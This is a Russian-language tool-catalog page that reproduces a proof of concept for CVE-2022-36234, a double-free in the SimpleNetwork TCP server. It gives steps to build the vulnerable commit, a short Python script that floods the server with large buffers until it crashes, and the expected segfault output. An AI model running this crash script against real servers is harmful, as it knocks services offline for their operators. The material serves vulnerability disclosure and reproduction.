Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-36234 — CVE-2022-36234的概念验证 | Kitploit
Инструменты/GitHubGitHub/halcy0nic/cve-2022-36234
Анализ уязвимостейЭксплуатацияФаззингТестирование на ПроникновениеОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubhalcy0nic/cve-2022-36234

CVE-2022-36234

CVE-2022-36234的概念验证

Репозиторий
293 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Описание CVE-2022-36234

Было обнаружено, что коммит 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496 SimpleNetwork TCP Server содержит уязвимость двойного освобождения, которая используется с помощью специально сформированных TCP-пакетов. Вызов двойного освобождения позволяет клиентам удалённо аварийно завершить работу любого SimpleNetwork TCP-сервера. В других ситуациях уязвимости двойного освобождения могут вызывать неопределённое поведение и, при определённых условиях, выполнение кода.

Воспроизведение

Чтобы убедиться, что у вас есть стандартные инструменты сборки, необходимые для компиляции библиотеки, установите следующие пакеты (в большинстве систем они уже будут установлены):

sudo apt-get install build-essential git

Уязвимость можно воспроизвести, отправляя последовательные запросы на сервер, содержащие большой буфер символов в TCP-пакете. Сначала скомпилируйте библиотеку 'libSimpleNetwork' и пример сервера, предоставленные в исходном коде:

git clone https://github.com/kashimAstro/SimpleNetwork.git
cd SimpleNetwork
git checkout 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496
cd src
make
cd ../example-server
make

Запустите пример сервера:

./server 80 1

Сохраните следующий скрипт доказательства концепции на Python3 в файл (при необходимости измените хост):

import socket

host = "localhost"
port = 80                   # The same port as used by the server
buf = b'A'*10000

try:
    for i in range(50):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.sendall(buf)
        data = s.recv(1024)
        s.close()
        print('Received', repr(data))
except:
    print("Completed...")

Выполните скрипт на Python3:

python3 poc.py

Проверка аварийного завершения:

В случае успеха сервер аварийно завершит работу, и вы увидите следующий вывод приложения:

segmentation fault  ./server 80 1

Ссылки

  • https://owasp.org/www-community/vulnerabilities/Doubly_freeing_memory
  • https://cwe.mitre.org/data/definitions/415.html
  • https://github.com/kashimAstro/SimpleNetwork/issues/22
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36234
Скачать инструмент